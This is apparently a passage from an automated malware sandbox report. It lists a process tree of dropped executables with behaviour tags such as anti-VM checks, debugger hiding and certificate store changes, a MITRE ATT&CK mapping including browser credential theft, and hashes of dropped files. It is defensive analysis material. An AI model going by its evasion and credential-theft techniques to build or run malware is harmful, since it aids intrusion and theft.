C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe"C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3508
-
-
C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe"C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:880 -
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 684⤵
- Loads dropped DLL
- Program crash
PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2428
-
-
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"3⤵
- Executes dropped EXE
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:268
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1748
-
C:\Windows\system32\taskeng.exetaskeng.exe {ED4AE890-6A52-4F3B-8F30-ACF88E571A55} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]1⤵PID:3148
-
C:\ProgramData\omlnpw\uxek.exeC:\ProgramData\omlnpw\uxek.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2592
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50dadbeb6cb656c1adadb2015c5727321
SHA17bdb83d1c1dbbe875804d6ec90d87fc205638c16
SHA256323066e5228b20f9be99a08a9d14695423f8b12198ef49ff4bd537988e98c9ce
SHA512067cf6d24c40d0775e11c3fc0d9e8819d6dc63f92362fbbd82ec4dc25f38b92f2891da5c3811931821ae4937f4df290f16e4f1b3dd37145b75e6d2e9d4dfac41
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
16B
MD5aefd77f47fb84fae5ea194496b44c67a
SHA1dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA2564166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\soft[1]
Filesize987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
Filesize
3.4MB
MD5bd6a9d5ffd2bad77a792a14ab8f2775f
SHA19494a453e67cce126bbad031b33325e17deaf374
SHA256f610afd2849e89b2b04d2bdca5b33211be65081e94a5207cc51e4e0cb1c0d498
SHA5126cd104bf357c61374dde38dce2664a8101b051a9ba47379b762290022a20bbfe00d4f99e2a1d685f81718305b3b6c63fd70d20d46bc1963b737fb6d1ed7efc42
-
Filesize
5.1MB
MD5515748a93ce7beb3f4416ec66ba8488e
SHA13ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA5123ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb
-
Filesize
680KB
MD5896dc9ae02a4b0cf429b4346a3990fae
SHA117f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA2566498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
SHA512e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c
-
Filesize
1.7MB
MD587da0483aefde76a5086c5b2ea14304f
SHA1ae6b27aeaf487666c71b26397709004e65b09002
SHA25633f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4
-
Filesize
938KB
MD55b0bf9144e2661027c1621957b1ef278
SHA1589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177
-
Filesize
2KB
MD5189e4eefd73896e80f64b8ef8f73fef0
SHA1efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74
-
Filesize
2.9MB
MD541e7a544f14c8eeda7675b6f8fc2f267
SHA198585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA5126457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef
-
Filesize
2.8MB
MD549a690607e1d76e6970b724c4fd22ec7
SHA14b670fc77c181e9afb3986729ee3b585bc460c3f
SHA2560d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7
SHA51254ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b
-
Filesize
162B
MD51b7c22a214949975556626d7217e9a39
SHA1d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5
-
Filesize
4.5MB
MD5cf6bd1302ab35c1275fedadbabde12fa
SHA10b8f58dd6cc533ae2ac26abf9eac849962cbfeb1
SHA25614738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7
SHA512c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04
-
Filesize
3.8MB
MD5639af76cb7333cbd609da5d52a6e195b
SHA1a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483
SHA256a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8
SHA51267510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51
-
Filesize
2.8MB
MD575dd7a91559a030b7c608e32474413d0
SHA1a2f27e1caa02eda2e33577e530b9538b31ac6626
SHA256d4ad9f72eb0ec01c9b73ad3a798c19496d639ab67dc963acf1cfc8e59b869f95
SHA512a98b44e762d26050be8cd11fd2bc7609f8ac5cadf36bdb49b3c205ed30b1dfc2c77a59da6472a06766d629db0c283728bad6ff8a6d24a3c5dda6ba5b0888fdc5
-
Filesize
9.8MB
MD5db3632ef37d9e27dfa2fd76f320540ca
SHA1f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA2560513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA5124490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd
-
Filesize
325KB
MD5f071beebff0bcff843395dc61a8d53c8
SHA182444a2bba58b07cb8e74a28b4b0f715500749b2
SHA2560d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA5121ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
726B
MD5ae563590dd5b65fb84045428b3c11628
SHA15690c743b714148b4017ea721dad61b654976dce
SHA2560ef0e06906218a3cbe624c964e5fd67bf277e3d3ee6cf291af5db22ceada9d88
SHA5122186ad4b4bbc1f9180139d38f9d89369561e7bc867359d424a0984ac7683ce86ab30d5dfd2697f6249988b102358e769f41e275bb8b1917d845a4e5b7294827a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD59b007a287efa6b3a81140630ab982f57
SHA15d25771df48e4f684da495be34f9f4397cc1b262
SHA2566003b304cea7770b10db506f07194eacfa3a0a794df79bc42af91cacca68c02c
SHA5123e97c17b2661d1b9476bb0b195e6773c68f13564e952f6758cbf8078160fdf31b0d8ea04f8465ad4c8475819e6f50a054178d07ce2d18482c8422a232511ded8
-
Filesize
216B
MD5738b0ee088c4454612ca08bd68ff3db8
SHA1af6ed558fc5daebccb1e4fa96cbaab2867ed8920
SHA256caf2043f1d8c51b1c2a16dc58552bb6e73a8794d0d24b0389716313ae52c12b0
SHA51250f608b38e8975d97dfc389d297a9615beada8fd2a43f7a9053d9f142dd292fef49f873d44b51952deea566b2f05fb8d69b5557c150f45af5e18ca2f583d53b5
-
Filesize
1.7MB
MD503a574d64f0e62c5e117a5f5acf137e4
SHA193ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1
-
Filesize
1.7MB
MD59d6f03d5a83f9ab0de52c69257720122
SHA1407ce825de553f856059543cb20c2002f4b2b87d
SHA256ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6
SHA512d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db
-
Filesize
3.1MB
MD5d433e1dc943e6ea29d67cf72d2f6fecd
SHA19964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43
-
Filesize
2.1MB
MD5a3ec4b44e7677c12a76bf51f45480133
SHA115587b7a0420115e979461490689a79beca64118
SHA25697ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
SHA5124d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075